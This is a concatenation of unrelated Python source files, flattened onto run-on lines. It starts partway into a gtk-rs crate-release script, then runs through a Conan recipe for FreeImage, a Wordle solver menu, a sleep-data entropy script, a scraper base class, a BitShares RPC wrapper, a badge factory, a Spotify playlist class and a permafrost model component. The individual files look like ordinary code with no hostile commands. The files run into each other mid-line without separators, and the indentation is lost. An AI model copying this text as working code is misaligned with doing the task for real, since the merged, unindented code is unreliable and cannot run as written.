if line.startswith('searchIndex["{}"]'.format(crate_name.replace('-', '_'))): SEARCH_INDEX.append(line) found = True elif fill_extras is True: if before is True: SEARCH_INDEX_BEFORE.append(line) else: SEARCH_INDEX_AFTER.append(line) if found is False: input("Couldn't find \"{}\" in `{}`!\nTry to fix it and then press ENTER to continue..." .format(crate_name.replace('-', '_'), search_index)) def end_docs_build(temp_dir): path = join(temp_dir, consts.DOC_REPO) revert_changes(consts.DOC_REPO, temp_dir, ['COPYRIGHT.txt', 'LICENSE-APACHE.txt', 'LICENSE-MIT.txt']) try: with open(join(path, 'search-index.js'), 'w') as file: file.write('\n'.join(SEARCH_INDEX_BEFORE)) file.write('\n'.join(SEARCH_INDEX)) file.write('\n'.join(SEARCH_INDEX_AFTER)) command = ['bash', '-c', 'cd minifier && cargo run --release -- "{}"'.format(path)] if not exec_command_and_print_error(command): input("Couldn't run minifier! Try to fix it and then press ENTER to continue...") add_to_commit(consts.DOC_REPO, temp_dir, ['.']) except Exception as err: write_error('An exception occured in "end_docs_build": {}'.format(err)) input("Press ENTER to continue...") input('If you want to prevent "{}" to be updated, now is the good time! Press ENTER to ' 'continue...'.format(join(path, "main.js"))) def write_merged_prs(merged_prs, contributors, repo_url): content = '' for merged_pr in reversed(merged_prs): if merged_pr.title.startswith('[release] '): continue if merged_pr.author not in contributors: contributors.append(merged_pr.author) md_content = (merged_pr.title.replace('<', '<') .replace('>', '>') .replace('[', '\\[') .replace(']', '\\]') .replace('*', '\\*') .replace('_', '\\_')) content += ' * [{}]({}/pull/{})\n'.format(md_content, repo_url, merged_pr.number) return content + '\n' def build_blog_post(repositories, temp_dir, token): # pylint: disable=too-many-locals write_msg('=> Building blog post...') content = '''--- layout: post author: {} title: {} categories: [front, crates] date: {} --- * Write intro here * ### Changes For the interested ones, here is the list of the merged pull requests: '''.format(input('Enter author name: '), input('Enter title: '), time.strftime("%Y-%m-%d %H:00:00 +0000")) contributors = [] git = Github(token) oldest_date = None for repo in repositories: checkout_target_branch(repo, temp_dir, "crate") success, out, err = get_last_commit_date(repo, temp_dir) if not success: write_msg("Couldn't get PRs for '{}': {}".format(repo, err)) continue max_date = datetime.date.fromtimestamp(int(out)) if oldest_date is None or max_date < oldest_date: oldest_date = max_date write_msg("Gettings merged PRs from {}...".format(repo)) merged_prs = git.get_pulls(repo, consts.ORGANIZATION, 'closed', max_date, only_merged=True) write_msg("=> Got {} merged PRs".format(len(merged_prs))) if len(merged_prs) < 1: continue repo_url = '{}/{}/{}'.format(consts.GITHUB_URL, consts.ORGANIZATION, repo) content += '[{}]({}):\n\n'.format(repo, repo_url) content += write_merged_prs(merged_prs, contributors, repo_url) write_msg("Gettings merged PRs from gir...") merged_prs = git.get_pulls('gir', consts.ORGANIZATION, 'closed', oldest_date, only_merged=True) write_msg("=> Got {} merged PRs".format(len(merged_prs))) if len(merged_prs) > 0: repo_url = '{}/{}/{}'.format(consts.GITHUB_URL, consts.ORGANIZATION, 'gir') content += ('All this was possible thanks to the [gtk-rs/gir]({}) project as well:\n\n' .format(repo_url)) content += write_merged_prs(merged_prs, contributors, repo_url) content += 'Thanks to all of our contributors for their 
(awesome!) work on this release:\n\n' # Sort contributors list alphabetically with case insensitive. contributors = sorted(contributors, key=lambda s: s.casefold()) content += '\n'.join([' * [@{}]({}/{})'.format(contributor, consts.GITHUB_URL, contributor) for contributor in contributors]) content += '\n' file_name = join(join(temp_dir, consts.BLOG_REPO), '_posts/{}-new-release.md'.format(time.strftime("%Y-%m-%d"))) try: with open(file_name, 'w') as outfile: outfile.write(content) write_msg('New blog post written into "{}".'.format(file_name)) add_to_commit(consts.BLOG_REPO, temp_dir, [file_name]) commit(consts.BLOG_REPO, temp_dir, "Add new blog post") except Exception as err: write_error('build_blog_post failed: {}'.format(err)) write_msg('\n=> Here is the blog post content:\n{}\n<='.format(content)) write_msg('Done!') def generate_new_tag(repository, temp_dir, specified_crate, args): # We make a new tag for every crate: # # * If it is a "sys" crate, then we add its name to the tag # * If not, then we just keep its version number for crate in args.crates: crate = crate['crate'] if crate['repository'] == repository: if specified_crate is not None and crate['crate'] != specified_crate: continue tag_name = CRATES_VERSION[crate['crate']] if crate['crate'].endswith('-sys') or crate['crate'].endswith('-sys-rs'): tag_name = '{}-{}'.format(crate['crate'], tag_name) write_msg('==> Creating new tag "{}" for repository "{}"...'.format(tag_name, repository)) create_tag_and_push(tag_name, repository, temp_dir) def generate_new_branches(repository, temp_dir, specified_crate, args): # We make a new branch for every crate based on the current "crate" branch: # # * If it is a "sys" crate, then we ignore it. # * If not, then we create a new branch for crate in args.crates: crate = crate['crate'] if crate['repository'] == repository: if specified_crate is not None and crate['crate'] != specified_crate: continue if crate['crate'].endswith('-sys') or crate['crate'].endswith('-sys-rs'): continue branch_name = CRATES_VERSION[crate['crate']] write_msg('==> Creating new branch "{}" for repository "{}"...'.format(branch_name, repository)) push(repository, temp_dir, branch_name) def update_doc_content_repository(repositories, temp_dir, token, no_push, args): if clone_repo(consts.DOC_CONTENT_REPO, temp_dir) is False: input('Try to fix the problem then press ENTER to continue...') write_msg("Done!") repo_path = join(temp_dir, consts.DOC_CONTENT_REPO) write_msg("=> Generating documentation for crates...") for repo in repositories: current = None for crate in args.crates: crate = crate['crate'] if crate['repository'] == repo: current = crate break if current is None: input('No repository matches "{}", something is weird. (Press ENTER TO CONTINUE)') continue if current.get("doc", True) is False: continue write_msg('==> Generating documentation for "{}"'.format(current)) path = join(temp_dir, current['repository']) command = ['bash', '-c', 'cd {} && make doc && mv vendor.md {}'.format(path, join(repo_path, current['crate']))] if not exec_command_and_print_error(command): input("Fix the error and then press ENTER") write_msg('Done!') write_msg('Committing "{}" changes...'.format(consts.DOC_CONTENT_REPO)) commit(consts.DOC_CONTENT_REPO, temp_dir, "Update vendor files") if no_push is False: push(consts.DOC_CONTENT_REPO, temp_dir, consts.MASTER_TMP_BRANCH) # We always make minor releases in here, no need for a more important one considering we don't # change the API. 
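# UpdateType.MINOR bumps what update_version() near the top of this script treats as the
# least-significant slot of the X.Y.Z triple (the larger update types reset it), e.g.
# "1.2.3" -> "1.2.4"; the example value is illustrative and the concrete enum values are
# defined in the args module.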
if update_repo_version(consts.DOC_CONTENT_REPO, consts.DOC_CONTENT_REPO, "", temp_dir, UpdateType.MINOR, False) is False: write_error('The update for the "{}" crate failed...'.format(consts.DOC_CONTENT_REPO)) input('Fix the error and then press ENTER') commit(consts.DOC_CONTENT_REPO, temp_dir, "Update version") if no_push is False: push(consts.DOC_CONTENT_REPO, temp_dir, consts.MASTER_TMP_BRANCH) create_pull_request(consts.DOC_CONTENT_REPO, consts.MASTER_TMP_BRANCH, "master", token, False) input(('All done with the "{}" update: please merge the PR then press ENTER so the ' 'publication can performed...').format(consts.DOC_CONTENT_REPO)) publish_crate(consts.DOC_CONTENT_REPO, "", temp_dir, consts.DOC_CONTENT_REPO, checkout_branch='master') write_msg('Ok all done! We can move forward now!') else: write_msg(('All with "{}", you still need to publish a new version if you want the changes ' 'to be taken into account').format(consts.DOC_CONTENT_REPO)) def clone_repositories(args, temp_dir): write_msg('=> Cloning the repositories...') repositories = [] for crate in args.crates: crate = crate['crate'] if args.specified_crate is not None and crate['crate'] != args.specified_crate: continue if crate["repository"] not in repositories: repositories.append(crate["repository"]) if clone_repo(crate["repository"], temp_dir) is False: write_error('Cannot clone the "{}" repository...'.format(crate["repository"])) return [] if len(repositories) < 1: write_msg('No crate "{}" found. Aborting...'.format(args.specified_crate)) return [] if args.doc_only is False: if clone_repo(consts.BLOG_REPO, temp_dir, depth=1) is False: write_error('Cannot clone the "{}" repository...'.format(consts.BLOG_REPO)) return [] if clone_repo(consts.DOC_REPO, temp_dir, depth=1) is False: write_error('Cannot clone the "{}" repository...'.format(consts.DOC_REPO)) return [] write_msg('Done!') return repositories def update_crates_versions(args, temp_dir, repositories): write_msg('=> Updating [master] crates version...') for crate in args.crates: update_type = crate['up-type'] crate = crate['crate'] if args.specified_crate is not None and crate['crate'] != args.specified_crate: continue if update_repo_version(crate["repository"], crate["crate"], crate["path"], temp_dir, update_type, args.badges_only or args.tags_only) is False: write_error('The update for the "{}" crate failed...'.format(crate["crate"])) return False write_msg('Done!') if args.badges_only is False and args.tags_only is False: write_msg('=> Committing{} to the "{}" branch...' 
.format(" and pushing" if args.no_push is False else "", consts.MASTER_TMP_BRANCH)) for repo in repositories: commit(repo, temp_dir, "Update versions [ci skip]") if args.no_push is False: push(repo, temp_dir, consts.MASTER_TMP_BRANCH) write_msg('Done!') if args.no_push is False: write_msg('=> Creating PRs on master branch...') for repo in repositories: create_pull_request(repo, consts.MASTER_TMP_BRANCH, "master", args.token) write_msg('Done!') return True def update_crate_repositories_branches(args, temp_dir, repositories): write_msg('=> Merging "master" branches into "crate" branches...') for repo in repositories: merging_branches(repo, temp_dir, "master") write_msg('Done!') write_msg('=> Updating [crate] crates version...') for crate in args.crates: crate = crate['crate'] if args.specified_crate is not None and crate['crate'] != args.specified_crate: continue if update_crate_version(crate["repository"], crate["crate"], crate["path"], temp_dir, args.specified_crate) is False: write_error('The update for the "{}" crate failed...'.format(crate["crate"])) return False write_msg('Done!') write_msg('=> Committing{} to the "{}" branch...' .format(" and pushing" if args.no_push is False else "", consts.CRATE_TMP_BRANCH)) for repo in repositories: commit(repo, temp_dir, "Update versions [ci skip]") if args.no_push is False: push(repo, temp_dir, consts.CRATE_TMP_BRANCH) write_msg('Done!') if args.no_push is False: write_msg('=> Creating PRs on crate branch...') for repo in repositories: create_pull_request(repo, consts.CRATE_TMP_BRANCH, "crate", args.token) write_msg('Done!') return True def publish_crates(args, temp_dir): write_msg('+++++++++++++++') write_msg('++ IMPORTANT ++') write_msg('+++++++++++++++') write_msg('Almost everything has been done. Take a deep breath, check for opened ' 'pull requests and once done, we can move forward!') write_msg("\n{}\n".format('\n'.join(PULL_REQUESTS))) PULL_REQUESTS.append('=============') input('Press ENTER to continue...') write_msg('=> Publishing crates...') for crate in args.crates: crate = crate['crate'] if args.specified_crate is not None and crate['crate'] != args.specified_crate: continue publish_crate(crate["repository"], crate["path"], temp_dir, crate['crate']) write_msg('Done!') def create_example_repository_pull_request(args): write_msg('=> Creating PR for examples repository') create_pull_request("examples", "pending", "master", args.token) write_msg('Done!') def generate_tags_and_version_branches(args, temp_dir, repositories): if args.no_push is True or args.doc_only is True or args.badges_only is True: return write_msg("=> Generating tags and branches...") for repo in repositories: generate_new_tag(repo, temp_dir, args.specified_crate, args) generate_new_branches(repo, temp_dir, args.specified_crate, args) write_msg('Done!') def regenerate_documentation(args, temp_dir, repositories): if args.badges_only is True or args.tags_only is True: return input("About to regenerate documentation. Are you sure you want to continue? 
" + "(Press ENTER to continue)") update_doc_content_repository(repositories, temp_dir, args.token, args.no_push, args) write_msg('=> Preparing doc repo (too much dark magic in here urg)...') cleanup_doc_repo(temp_dir) write_msg('Done!') write_msg('=> Building docs...') for crate in args.crates: crate = crate['crate'] if crate['crate'] == 'gtk-test': continue write_msg('-> Building docs for {}...'.format(crate['crate'])) build_docs(crate['repository'], temp_dir, crate['path'], crate.get('doc_name', crate['crate'])) end_docs_build(temp_dir) write_msg('Done!') write_msg('=> Committing{} docs to the "{}" branch...' .format(" and pushing" if args.no_push is False else "", consts.CRATE_TMP_BRANCH)) commit(consts.DOC_REPO, temp_dir, "Regen docs") if args.no_push is False: push(consts.DOC_REPO, temp_dir, consts.CRATE_TMP_BRANCH) create_pull_request( consts.DOC_REPO, consts.CRATE_TMP_BRANCH, "gh-pages", args.token) write_msg("New pull request(s):\n\n{}\n".format('\n'.join(PULL_REQUESTS))) write_msg('Done!') def update_gtk_rs_blog(args, temp_dir): if args.doc_only is True or args.tags_only is True: return write_msg('=> Updating blog...') if update_badges(consts.BLOG_REPO, temp_dir, args.specified_crate) is False: write_error("Error when trying to update badges...") elif args.no_push is False: commit_and_push(consts.BLOG_REPO, temp_dir, "Update versions", consts.MASTER_TMP_BRANCH) create_pull_request( consts.BLOG_REPO, consts.MASTER_TMP_BRANCH, "master", args.token) write_msg('Done!') def checkout_crate_branches(temp_dir, repositories): write_msg('=> Checking out "crate" branches') for repo in repositories: checkout_target_branch(repo, temp_dir, "crate") write_msg('Done!') def start(args, temp_dir): repositories = clone_repositories(args, temp_dir) if len(repositories) < 1: return if args.doc_only is False: if update_crates_versions(args, temp_dir, repositories) is False: return if args.badges_only is False and args.tags_only is False: build_blog_post(repositories, temp_dir, args.token) checkout_crate_branches(temp_dir, repositories) if args.doc_only is False and args.badges_only is False and args.tags_only is False: if update_crate_repositories_branches(args, temp_dir, repositories) is False: return if args.no_push is False: publish_crates(args, temp_dir) create_example_repository_pull_request(args) generate_tags_and_version_branches(args, temp_dir, repositories) regenerate_documentation(args, temp_dir, repositories) update_gtk_rs_blog(args, temp_dir) write_msg('Seems like most things are done! 
Now remains:') write_msg(" * Check generated docs for all crates (don't forget to enable features!).") input('Press ENTER to leave (once done, the temporary directory "{}" will be destroyed)' .format(temp_dir)) def main(argv): args = Arguments.parse_arguments(argv) if args is None: sys.exit(1) if check_rustdoc_is_nightly() is False: return if check_if_up_to_date() is False: return write_msg('=> Creating temporary directory...') with temporary_directory() as temp_dir: write_msg('Temporary directory created in "{}"'.format(temp_dir)) start(args, temp_dir) # Beginning of the script if __name__ == "__main__": main(sys.argv[1:]) conanfile.py0 import os import shutil from conans import ConanFile from conans import tools from conans import AutoToolsBuildEnvironment class FreeImageConan(ConanFile): name = "freeimage" version = "3.18.0" description = "FreeImage for Windows, pre-built binaries are supplied" license = "FIPL" settings = "os_build", "compiler", "build_type", "arch_build" url = "https://github.com/bldrvnlw/conan-freeimage" _source_subfolder = "FreeImage" _build_subfolder = "build_subfolder" _dist_subfolder = None def configure(self): pass def source(self): if self.settings.os_build != "Windows": tools.get("http://downloads.sourceforge.net/freeimage/FreeImage3180.zip") def build(self): if self.settings.os_build == "Windows": tools.get("http://downloads.sourceforge.net/freeimage/FreeImage3180Win32Win64.zip") else: autotools = AutoToolsBuildEnvironment(self) # In order to set environment vars - unused in this recipe env_build_vars = autotools.vars with tools.chdir(self._source_subfolder): # FIP : Makefile.fip is for FreeImagePlus, the C++ FreeImage wrapper # make if self.settings.os_build == "Macos": tools.replace_in_file('Makefile.osx', '-DNO_LCMS', '-DNO_LCMS -DDISABLE_PERF_MEASUREMENT') autotools.make(target="-f Makefile.osx", vars=env_build_vars) else: autotools.make(target="-f Makefile.gnu", vars=env_build_vars) print("Cur dir: ", os.getcwd(), " Dist subdir: ", os.listdir("./Dist")) self._dist_subfolder = os.path.join(os.getcwd(), "Dist"); # make install - not possible because chown fails #autotools.make(target="-f Makefile.gnu install", vars=env_build_vars) def package(self): if self.settings.os_build == "Windows": if self.settings.arch_build == "x86_64": src = os.path.join(self.build_folder, "FreeImage/Dist/x64") elif self.settings.arch_build == "x86": src = os.path.join(self.build_folder, "FreeImage/Dist/x32") self.copy("*.lib", dst="lib", src=src, keep_path=False) self.copy("*.dll", dst="bin", src=src, keep_path=False) self.copy("*.h", dst="include", src=src, keep_path=False) else: with tools.chdir(self._source_subfolder): self.copy("*.a", dst=os.path.join(self.package_folder, "lib"), src=self._dist_subfolder, keep_path=False) self.copy("*.so", dst=os.path.join(self.package_folder, "bin"), src=self._dist_subfolder, keep_path=False) self.copy("*.h", dst=os.path.join(self.package_folder, "include"), src=self._dist_subfolder, keep_path=False) if self.settings.os_build == "Macos": # dylib should be symlinked to the .a file (perhaps at conan install time) # Quick solution just copy & rename self.copy("*.a", dst=os.path.join(self.package_folder, "bin"), src=self._dist_subfolder, keep_path=False) os.rename(os.path.join(self.package_folder, "bin/libfreeimage.a"), os.path.join(self.package_folder, "bin/libfreeimage.dylib")) def package_info(self): self.cpp_info.libs = ["freeimage"]from game import Game import time from data import Data from simulation import buildPlots, letterDistributions 
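# Game drives the 'classic' and 'info' modes, Data powers the interactive 'help' mode, and
# buildPlots/letterDistributions back the long-running 'plots' simulation in the main block below.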
from colorama import Fore if __name__ == '__main__': print("Welcome to my Wordle solver. You have a few options for what mode to run the program in. First, is the\n"+ "classic Wordle game in which you receive no help from the computer. The second is the info mode, which is\n"+ "like the classic game except you do receive help from the computer to reach the answer quicker. Next, their\n"+ "is the 'help' mode in which you play on your phone and enter your guess and the pattern you saw. This mode\n"+ "is included so that you can see it work on the daily Wordle which the program has no way of knowing. And if\n"+ "you want help of course. Finally, there is a 'plots' mode that will simulate 500 Wordle games for the top 100\n"+ "start words but I highly discourage this because you will be waiting a while. Enter 'classic', 'info', 'help',\n"+ "or 'plots' when you are ready.") mode = "" while mode != "classic" and mode != "info" and mode != "help" and mode != "plots": mode = input("Mode:").lower() if mode == "classic": game = Game() game.playClassic() elif mode == "info": game = Game() game.playWithInfo() elif mode == "help": print("In this mode the program will help you solve the daily Wordle online. To use it, will prompt you to\n"+ "enter your guess with the 'Guess:'. Make sure to enter the guess in all-caps. Once you enter your\n"+ "most recent guess, it will prompt you to enter the pattern you saw with that guess. This program \n"+ "encodes patters using 0's, 1's, and 2's for gray, yellow, and green respectively. So if the pattern\n"+ "you saw was gray, gray, yellow, gray, green, then you should enter 00102. Once you've entered a \n"+ "guess and the pattern you saw, you will be given a list of suggested guesses where for each guess\n"+ "you are given the amount of information you can expect to gain from that guess and the probability\n"+ "of that guess being the answer. Once the program narrows it down sufficiently, it will exit and tell\n"+ "you what the likely answer is.") data = Data() pattern = "00000" while len(data.possible) > 2: guess = input("Guess:") pattern = input("Pattern:") data.processInput(guess, pattern) print(Fore.BLACK + "WORD E[Info] Var[Info] p(WORD)") topTen = data.giveTop(10) for row in topTen: word, info, var, prob = row[0], row[1], row[2], row[3] print(f"{word} {round(info, 4)} {round(var,4)} {round(prob, 6)}") elif mode == "plots": letterDistributions() buildPlots() else: print("Please enter 'classic', 'info', 'help', or 'plots") time.sleep(2) print("\033[A \033[A") print("\033[A \033[A")############################################################# # # Real-world Data 1. 
Sleep Data # ############################################################# import sys, os sys.path.append("../..") sys.path.append("..") sys.path.append(os.getcwd()) import numpy as np import pandas as pd import copy import pickle from math import log, e from sklearn.linear_model import LinearRegression from numpy.linalg import eig from tslb.src.lzw import * from tslb.src.utils import * def import_data(): df = pd.read_csv("../data/sleep_data.csv", header=None) df = df[0].str.split(" ", expand = True) df.columns = ["heart_rate", "sleep", "temperature"] return df def plot_data(data): plt.title("Sleep Data") # plt.scatter(np.arange(len(data)),data, marker='.') plt.plot(data, marker='.') plt.xlabel("time") plt.ylabel("sleep status") plt.yticks([1,2,3,4]) plt.savefig("result/sleep_data.pdf", format='pdf') plt.show() def run_test(data, n): # input data = (pandas Series) # n = number of categories size = len(data) verbose = True ################ unique = np.unique(data) label = 0 for x in unique: data[data == x] = label label += 1 print(data) # observation analysis p_tilda=[] for i in range(1,n+1): p = np.mean(np.array(data.astype(int)) == i) p_tilda.append(p) print(p_tilda) # compression uncompressed = list_to_string(list(data)) compressed = compress(uncompressed) compression_ratio = len(compressed)/len(uncompressed) # entropy estimated_ent = get_entropy(n, size, compression_ratio, name = "sleep data", plot=True) # empirical_ent = entropy(p_tilda) # empirical_ent = 0 # lower bound lb = h_inverse(estimated_ent, n, a=0.0001) if verbose: print("p_tilda : ", np.round(p_tilda,3)) print("Compression ratio : ", compression_ratio) print("Estimated entropy : ", estimated_ent) # print("Empirical entropy : ", empirical_ent) print("P(e) lower bound : ", lb) # return compression_ratio, estimated_ent, empirical_ent def main(): print("*******************************************************") print("*******************************************************") print("********** Running the Testing Scripts. ***************") plt.rcParams.update({'font.size': 14}) plt.rcParams.update({'figure.autolayout': True}) df = import_data() data = df.sleep n = len(np.unique(data)) print("n=", n) data = data.astype(int) plot_data(data) # run_test(data, n) print("********** Testing Scripts Done. 
**********************") print("*******************************************************") print("*******************************************************") if __name__ == "__main__": main() # -*- coding: utf-8 -*- import logging from chibi.snippet import regex from chibi.snippet.func import retry_on_exception from chibi_requests import Chibi_url from .exceptions import Unexpected_response from .regex import main_url logger = logging.getLogger( 'kudasai.base' ) class Site: def __init__( self, url=None ): self.urls = [] if not url: raise NotImplementedError self.url = Chibi_url( url ) def append( self, url ): url = Chibi_url( url ) if not self.processing_order: raise NotImplementedError for proccesor in self.processing_order: result = proccesor.can_proccess( url ) if result: self.urls.append( proccesor( url ) ) return result @staticmethod def can_proccess( url ): raise NotImplementedError @retry_on_exception def get( self, *args, url=None, **kw ): if url is None: url = self.url response = url.get() if not response.ok: raise Unexpected_response return response @property def soup( self ): try: return self._soup except AttributeError: response = self.get() self._soup = response.native return self._soup import re from grapheneapi.api import Api as Original_Api from bitsharesbase.chains import known_chains from . import exceptions class Api(Original_Api): def post_process_exception(self, e): msg = exceptions.decodeRPCErrorMsg(e).strip() if msg == "missing required active authority": raise exceptions.MissingRequiredActiveAuthority elif re.match("current_account_itr == acnt_indx.indices().get().end()", msg): raise exceptions.AccountCouldntBeFoundException(msg) elif re.match("Assert Exception: is_valid_name( name )", msg): raise exceptions.InvalidAccountNameException(msg) elif re.match("^no method with name.*", msg): raise exceptions.NoMethodWithName(msg) elif msg: raise exceptions.UnhandledRPCError(msg) else: raise e class BitSharesNodeRPC(Api): def get_network(self): """ Identify the connected network. This call returns a dictionary with keys chain_id, core_symbol and prefix """ props = self.get_chain_properties() chain_id = props["chain_id"] for k, v in known_chains.items(): if v["chain_id"] == chain_id: return v raise Exception("Connecting to unknown network!") def get_account(self, name, **kwargs): """ Get full account details from account name or id :param str name: Account name or account id """ if len(name.split(".")) == 3: return self.get_objects([name])[0] else: return self.get_account_by_name(name, **kwargs) def get_asset(self, name, **kwargs): """ Get full asset from name of id :param str name: Symbol name or asset id (e.g. 1.3.0) """ if len(name.split(".")) == 3: return self.get_objects([name], **kwargs)[0] else: return self.lookup_asset_symbols([name], **kwargs)[0] def get_object(self, o, **kwargs): """ Get object with id ``o`` :param str o: Full object id """ return self.get_objects([o], **kwargs)[0] # encoding: utf-8 from labour.models import PersonnelClass def default_badge_factory(event, person): """ Specifies badge options, such as badge template and job title, given an event and a person. Returns a dictionary that can be fed into the constructor of badges.models:Badge. 
""" job_title = u'' if event.labour_event_meta is not None: from labour.models import Signup try: signup = Signup.objects.get(event=event, person=person) except Signup.DoesNotExist: # XXX blatantly assuming it's a programme person job_title = u'Ohjelmanjärjestäjä' personnel_class = PersonnelClass.objects.get(event=event, slug='ohjelma') else: if signup.job_title: job_title = signup.job_title elif signup.job_categories_accepted.exists(): job_title = signup.job_categories_accepted.first().name personnel_class = signup.personnel_classes.order_by('priority').first() return dict( personnel_class=personnel_class, job_title=job_title, ) spotify/playlist_unseen_tracks.py from __future__ import unicode_literals import logging import pprint import spotify from spotify import compat, ffi, lib, serialized __all__ = ["PlaylistUnseenTracks"] logger = logging.getLogger(__name__) class PlaylistUnseenTracks(compat.Sequence): """A list of unseen tracks in a playlist. The list may contain items that are :class:`None`. Returned by :meth:`PlaylistContainer.get_unseen_tracks`. """ _BATCH_SIZE = 100 @serialized def __init__(self, session, sp_playlistcontainer, sp_playlist): self._session = session lib.sp_playlistcontainer_add_ref(sp_playlistcontainer) self._sp_playlistcontainer = ffi.gc( sp_playlistcontainer, lib.sp_playlistcontainer_release ) lib.sp_playlist_add_ref(sp_playlist) self._sp_playlist = ffi.gc(sp_playlist, lib.sp_playlist_release) self._num_tracks = 0 self._sp_tracks_len = 0 self._get_more_tracks() @serialized def _get_more_tracks(self): self._sp_tracks_len = min( self._num_tracks, self._sp_tracks_len + self._BATCH_SIZE ) self._sp_tracks = ffi.new("sp_track *[]", self._sp_tracks_len) self._num_tracks = lib.sp_playlistcontainer_get_unseen_tracks( self._sp_playlistcontainer, self._sp_playlist, self._sp_tracks, self._sp_tracks_len, ) if self._num_tracks < 0: raise spotify.Error("Failed to get unseen tracks for playlist") def __len__(self): return self._num_tracks def __getitem__(self, key): if isinstance(key, slice): return list(self).__getitem__(key) if not isinstance(key, int): raise TypeError( "list indices must be int or slice, not %s" % key.__class__.__name__ ) if key < 0: key += self.__len__() if not 0 <= key < self.__len__(): raise IndexError("list index out of range") while key >= self._sp_tracks_len: self._get_more_tracks() sp_track = self._sp_tracks[key] if sp_track == ffi.NULL: return None return spotify.Track(self._session, sp_track=sp_track, add_ref=True) def __repr__(self): return "PlaylistUnseenTracks(%s)" % pprint.pformat(list(self)) mcflugen/permamodel # -*- coding: utf-8 -*- """ Kudryavtsev model by Anisimov et al. (1997). ., ., & . (1997). Global warming and active-layer thickness: results from transient general circulation models. Global and Planetary Change, 15(3-4), 61-77. DOI:10.1016/S0921-8181(97)00009-X *The MIT License (MIT)* Copyright (c) 2016 permamodel Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. 
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. * """ from __future__ import print_function import warnings warnings.filterwarnings("ignore",category =RuntimeWarning) import numpy as np from permamodel.utils import model_input from permamodel.components import perma_base from permamodel.components import Ku_method #from permamodel.components.perma_base import * #from permamodel.tests import examples_directory import os """ class BmiKuMethod( perma_base.PermafrostComponent ): _thisname = 'this name' """ class BmiKuMethod( perma_base.PermafrostComponent ): """ Implement the Ku model """ # Set up the name of this permafrost module _name = 'Ku module' """ Note: all of these are defined below instead! # Indicate the CSDMS standard names of input and output variables _input_var_names = ('land_surface_air__temperature', 'land_surface__latitude', 'land_surface__longitude', ) # other standard names that might apply? # land_surface__temperature # model__initial_time_step # model__max_allowed_time_step # model__min_allowed_time_step # model__run_time # model__spinup_time # model__start_time # model__stop_time # model__time # model__time_step # model__time_step_count _output_var_names = ('frost_number_air', 'frost_number_surface', 'frost_number_stefan', ) # other standard names that might apply? # soil_permafrost__thickness # soil_permafrost_top__depth # soil_permafrost_bottom__depth """ #------------------------------------------------------------------- _att_map = { # NOTE: this will change in the future 'model_name': 'PermaModel_Kudryavtsev_method', 'version': '0.1', 'author_name': ' and ', 'grid_type': 'none', 'time_step_type': 'fixed', 'step_method': 'explicit', #------------------------------------------------------------- 'comp_name': 'Ku_model', 'model_family': 'PermaModel', 'cfg_extension': '_ku_model.cfg', 'cmt_var_prefix': '/input/', 'gui_yaml_file': '/input/ku_model.yaml', 'time_units': 'years' } # This used to be [...] instead of (...) 
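# The BMI layer below advertises CSDMS-style long variable names; _var_name_map translates each
# long name to the short attribute used inside Ku_method (e.g. 'snowpack__depth' -> 'h_snow'),
# and _var_units_map records the matching units.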
_input_var_names = ( 'latitude', 'longitude', 'datetime__start', 'datetime__end', 'atmosphere_bottom_air__temperature', 'atmosphere_bottom_air__temperature_amplitude', 'snowpack__depth', 'snowpack__density', 'water-liquid__volumetric-water-content-soil', 'vegetation__Hvgf', 'vegetation__Hvgt', 'vegetation__Dvf', 'vegetation__Dvt' ) _output_var_names = ( 'soil__temperature', # Tps 'soil__active_layer_thickness' ) # Zal _var_name_map = { 'latitude': 'lat', 'longitude': 'lon', 'datetime__start': 'start_year', 'datetime__end': 'end_year', 'atmosphere_bottom_air__temperature': 'T_air', 'atmosphere_bottom_air__temperature_amplitude': 'A_air', 'snowpack__depth': 'h_snow', 'snowpack__density': 'rho_snow', 'water-liquid__volumetric-water-content-soil': 'vwc_H2O', 'vegetation__Hvgf': 'Hvgf', 'vegetation__Hvgt': 'Hvgt', 'vegetation__Dvf': 'Dvf', 'vegetation__Dvt': 'Dvt' , 'soil__temperature': 'Tps', 'soil__active_layer_thickness': 'Zal'} _var_units_map = { # These are the links to the model's variables' units 'latitude': 'degree_north', 'longitude': 'degree_east', 'datetime__start': 'year', 'datetime__end': 'year', 'atmosphere_bottom_air__temperature': 'deg_C', 'atmosphere_bottom_air__temperature_amplitude': 'deg_C', 'snowpack__depth': 'm', 'snowpack__density': 'kg m-3', 'water-liquid__volumetric-water-content-soil': 'm3 m-3', 'vegetation__Hvgf': 'm', 'vegetation__Hvgt': 'm', 'vegetation__Dvf': 'm2 s-1', 'vegetation__Dvt': 'm2 s-1' , 'soil__temperature': 'deg_C', 'soil__active_layer_thickness': 'm'} #------------------------------------------------------------------- def __init__(self): self._model = None self._values = {} self._var_units = {} self._grids = {} self._grid_type = {} def initialize(self, cfg_file=None): self._model = Ku_method.Ku_method() self._name = "Permamodel Ku Component" self._model.initialize(cfg_file=cfg_file) # make 2 vars to store each results and used for write out. 
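# The two output arrays created below are shaped (n_time, n_lat, n_lon) and pre-filled with NaN,
# so any time step never reached by update() stays recognisably empty when save_grids() writes
# the .nc output files.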
